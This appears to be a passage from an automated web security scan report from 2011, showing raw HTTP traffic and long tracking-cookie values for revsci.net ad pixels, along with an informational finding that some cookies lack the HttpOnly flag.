NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wcBHbKR1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOzdSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4df0ca7b&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dca0a20&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4U9BenIMH/AtZKgq+hMq9rGiLObgpWFak32IrQMGnmfHuiYgDQaAwxUK6pw26DoqxCfW+epi+gzC9/vSCTB7imSFpaF3jgTKu6gUiM/MJRCfSdEcMdPs9/RVdVv7DqMTpKG3eKUxCc7lJ3d4uPsvbVf83JLReyHT0jN1BuyEb58GYv/LxKgpVexexquZuKeRToBghnCuFqedwf+X0+YnFhOw3uzxK/X4Wxo4bJAn8weCR02tpdbg/bYqVKAiPNbO41848Z9KpOZKRQN0OL0sNJ8kypkLypj36j7Rm+95zJAPtLzSvq8LWyyFTHdPsSmDFFA0qN+hBON4H4Tla7JACrXtwZLbYkaPwY2qoG7JOev/Lg0kSAEhAN2j3I9if3B+HvsTrxBc9VsohGW/b5fsT/tmOND8GjL62aEQOR/ttAt0Onz37bTRxfaITzexWf8P4aLkngBQJFzAETbKu4iCLf6EtYpH/CugM6sxzwqlgJTBZx1A1ese7+q70nG0SvwKBqGIcTjIrFSjkDn5CzxinzmiyVAsj6DVZYCcQpO4K6wrWzDkpOGhK634uztGpLBxzNDkL2iLHVGdEKz5Km4E8XnMsb2RyQbsw85L6avb/ndujGtWPB5NktpSBX1O6xykGxIlNcuEc5A5TFcViyPHJABw0+SY5WKWD8c2KF7QNnJTYgtZ3vm04i/IDcOYg2G5ip1hh4c1VnrEwseNA7qKF/Cy3/YzH+zE075ArEjlj9BV5xbUneXnlUeWlupie2OZe8u2ys5vCR9G9DnRtFNHmqqqFsP1L8ZVcernhjIjN6695svzJRD24Wa6NO2oyXiieRAotYX9Fznu+/iFDnFKMY6gcKtR40K5DJPZ; rtc_8VB0=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; udm_0=MLv39zEJZjpn5t6vNwncn9Mhfm4nwPAq6ZuDn7aMZJ8AwsYAiiLCTArLH9zv1q5u+Lz4nRQU/ONtffuYZpEkRs7NSG0d9YhuoyF/MDVEU0eLoGV7CxWL+UMe7334j5jcQIpfs/yJtACeEpy404q3OrCeAI2wpexHC/IoDhZG5nt9JTlTOC0rUKpf3Tdo6hNWvImLqBVP8ps0lApz51dEO2W4LKo/vgAH8xS9eNJjV468/KuVWTcVzlHlhch6C7KXmQypGx4uASRIIVVd4xtBBX3TCSwTCSvq1RQf0H1lUJj7U2F7SbkoidrdNSNQYzn4q6heYKCeXjIGgaQ/A8hTpIO/gpYXHOAt71UVgPxcAm4fAa8JAjHA7iuw87T+BAc30ukDlNY1I/9/QVLCxTIXzloa/UqpgRTBHVAqkWtHNek2VRJBqrL5B/mWPUocGOb8DniKhuT7Ds7UPRBMexdFIHHI/mpU6yYmGNVwFQueFK01IWdDQarKK0P8NCGCo8hv8tuHkabXf8v7ZAV+yBQS8r3xiWTE1bP2OU/lS16fEp/i6wdmm3O3Fg3xrGmJbPDi0mf2WCD6VbG011u8gzVu9OTKDFxHneEny+70WuBBMYdpc5p4oKIFOTsS7fE2b96gku/XlfSB0WZoA90Ay6NAPMEL30rVqZKtDW8lAhzZn5hG6VyiZpsCneZNiXd42Fux0d4/yHR6wIaoS759qSOsmbV42omwnxZ2196cYXobfYLlDrGupJET0DH8mfrZFU8hHbFNX+CicMjq+3nGDTPBOwaqHx5Gmaav13axGITWM+e0An32Zjjz8ctWphmPC3OJhpGA3+YV5ZbMpWkEMLtxGX3SA42XlGiOTF6YKfGB3GsRFYIdJQizVIBWE/awvxf6lY17BunO3IleRCw4HjwlENbyeRATa7q8yTB3q6umGD8JoD/yd7gPPc2OmQggvinyn01WB9ifgMK1ZtoAtTumru6m2/c8W/PNvgE0J/rD8dFVwZD6OhaeAmx/3bq2Vh40efswOHYzNaqrYDJklpdWVRuKCgkS6AZszXI/3Xe9jUDDkny/WFWAvgeklDJRJwNq3pI58aI5stulcQdIJJxUIoDPQNhpwJFTVE7o31+O8FPJiSLpIuaSbCihy2Dxw97Rq2QUPRWf6knC0Sq5o9PDh2q14/AYkZyEBkX7XG8gWBrah2ZWvHM0o9R8Cf9Mpk3pmIDqOFy8UPj5Bnd6+JkF3fe6p+OFEdr7mZwx6PDLZJ+qHjC+zR+gFjxwrGYx7LCzolcSXN1KBy8NC7LbgOdmlFyg3aJRwNBHu+zaRVWgjK1MAkAQXABPMMNJncnjf2mzZVZK5i7CVqutEvzATQAk/4e2gw1H+6Hrv9gG9XpGMmoJo0SYS9XA8fFkwrHVqpCX1aVEMSdMOLDjPQzYn6yL0C1Z3E3sZA6/rAuE2WDyQcqns3VA4i/eJ7mPOghnw1QJZDLPMjbOaVyZ9jFId0OWFFkTtXgjPjkLLEWjvMPWD8HrDp3nIsDSmoCZEdTF33/bQxSuGrV7CPQoqiVTUuzmqVjVmH9c2zitJblsG2xUll03h/2VyIoVcdT7u/BuNBnmNQZlo5GlwAK7lt5iJZl/jA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_8VB0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4U+huXIQJ/AtY6gq+ml3T522uq5fRa4Xl2IwC5pim60ULm4HkQFsDVUZb5s2bLbFAQa1ZjEquwXyfGbWgIgdWaSS+YL6aC9Cc9VrqnipdbQjQZqCI+i4H2RQuUiHzLH2f2t3vGSKBCGuE0fpC2g/YwGZjgijJBW08L1WYocE1dH+lTU9IBr2Oj68jTvfCUcHOej76WSxhGuTdIIxYX7seXBkpRZI9DNKm8027exigdKxn8B2EzPbsTOL5V3lu9SwJhzoWWC8bIqnRpvYn/3n4CnotMSgpUYD5SX2TtWMY7kLtxS0FNLUSejpIcqkw3sUOqfRHlA69f7HNHAFg63CYMpNOWp8awin87czgo8z42yreyQR+PoY9kqjdQywB/DaYtUWH9iGtXEpQWyGvNw/f/uW94R6FhBhhXeE7B/tFKAx+ZaDhVSI1sd1JiFQ6+efecO48Oebl3jSE3Qhqnwn/TF3LDsOcV5MRV8McouKPiXjnqC/mBxMJROkv11ihtmv2ixHiCWo/tCPbYpyWjndi0qN2RS5IWUCgijCuKVSm6EEenK3faNTf8D9VT2XtD4VHgfEIfTyR2TnNik0lumEwIUx2YDt13iYwl2svI6nlMtRzdeHuD/XUtAAWMYWdja32FzBgbAGZXs8ek2oGMo278yaXwaQ8kaMdUqOtYgZc9f9jvFyGGFy9DCIi4I3Z/s2ow5xwm1NR67xk3oB+/4AfSutJR8Od2/VGjOOo2hXwpl2pj5r+hne2lTd+iiaix7TFcD3U9OvKCdj4C17oR9bnws2PtE1yc6iPaLsJL1gP7w6VLqi+KeBfOg6IRZY/rMIrVglMuOQjEPMwHfF+M8zT1gmmQ9KGvpW3eRyTACANqO/; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:33:53 GMT; Path=/
Set-Cookie: rtc_DAUd=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:33:53 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 13:33:52 GMT

GIF89a.............!.......,...........D..;
9.80. http://pix04.revsci.net/J10982/b3/0/3/noscript.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J10982/b3/0/3/noscript.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J10982/b3/0/3/noscript.gif?D=DM_LOC=http://lotame.com?2716=T HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zMTMmcHhpZD01ODE1JnB4aWQ9MTAwMSZweGlkPTUzJnB4aWQ9NDcyJnB4aWQ9NjA0MQ%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wc